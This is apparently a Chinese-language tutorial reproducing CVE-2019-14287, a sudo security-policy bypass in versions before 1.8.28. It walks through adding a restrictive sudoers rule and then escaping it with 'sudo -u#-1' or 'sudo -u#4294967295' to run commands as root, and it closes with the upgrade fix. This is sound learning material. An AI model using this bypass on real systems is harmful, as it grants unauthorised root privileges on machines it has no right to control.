(該文參考網絡他人資料,僅為學習,不許用於非法用途)
一、環境
1、sudo版本小於1.8.28的Linux系統
2、sudo 是Linux系統命令,讓普通賬號以root身份去執行某些命令,比如:安裝軟件、查看某些配置文件、關機、重啟等操作、如果普通用戶需要使用sudo,需要將修改配置文件/etc/sudoers,將sudo使用權賦予該賬號
sudo 提權漏洞是一個安全策略繞過問題,去執行某些敏感的命令,CVE編號是CVE-2019-14287,影響版本小於1.8.28
二、漏洞復現過程
Step1:查看版本
sudo -V
Step2:修改配置文件
vim /etc/sudoers
在root ALL=(ALL:ALL) ALL 下面添加一行配置:test ALL=(ALL,!root) ALL
注意:需創建test用戶:useradd test passwd test ,修改完配置文件保存退出::wq!
rest 表示test用戶
第一個ALL 表示用戶可以在任意地方使用sudo
第二個(ALL,!root) 表示命令可以被除了root以外的任意用戶執行
最后面的ALL 表示被允許執行
整體: test用戶可以使用sudo,但是除了root以外的任意用戶去執行命令
Step:切換到test用戶
su test
sudo id(查看root的id)
發現沒有權限去執行
使用如下方法執行我們想要執行的命令
sudo -u# 數字 命令
其中數字范圍:-1~4294967295,命令是系統命令
如果以root身份去執行命令,數字使用-1和4294967295
三、修復方法
更新sudo版本大於等於1.8.28
四、總結
該漏洞比較雞肋,需要管理員修改配置文件。